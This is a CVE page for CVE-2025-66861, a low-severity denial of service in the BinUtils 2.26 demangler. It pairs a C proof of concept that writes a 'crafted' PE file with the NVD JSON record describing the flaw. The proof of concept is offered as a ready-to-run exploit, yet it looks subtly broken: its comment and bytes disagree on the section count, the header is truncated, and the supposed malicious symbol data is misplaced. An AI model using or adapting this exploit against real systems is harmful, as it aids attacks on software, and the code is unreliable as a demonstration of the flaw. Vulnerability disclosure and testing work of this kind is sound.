CVE-2025-66861

/* * CVE-2025-66861 PoC - BinUtils cp-demangle.c DoS * Target: BinUtils 2.26 (cp-demangle.c d_unqualified_name) * Description: Crafted PE file triggers DoS in d_unqualified_name function */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Minimal PE header structure unsigned char crafted_pe[] = { // DOS Header 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, // PE Header offset 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // PE Signature 0x50, 0x45, 0x00, 0x00, // COFF Header (Machine: i386) 0x4C, 0x01, 0x03, 0x00, // NumberOfSections: 1 0x01, 0x00, 0x00, 0x00, // Crafted symbol table causing d_unqualified_name overflow 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x00, 0x00, 0x00, 0x00 }; int main() { FILE *fp = fopen("cve_2025_66861_crafted.pe", "wb"); if (fp) { fwrite(crafted_pe, 1, sizeof(crafted_pe), fp); fclose(fp); printf("PoC PE file created: cve_2025_66861_crafted.pe\n"); printf("Use BinUtils tools (objdump, c++filt) to process this file\n"); } return 0; }

{"cve": {"id": "CVE-2025-66861", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:45.997", "lastModified": "2026-01-14T19:36:16.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in function d_unqualified_name in file cp-demangle.c in BinUtils 2.26 allowing attackers to cause a denial of service via crafted PE file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:*", "matchCriteriaId": "7A0BCBA2-7605-4976-8364-E6D1484D0CA9"}]}]}], "references": [{"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash1.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash1.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}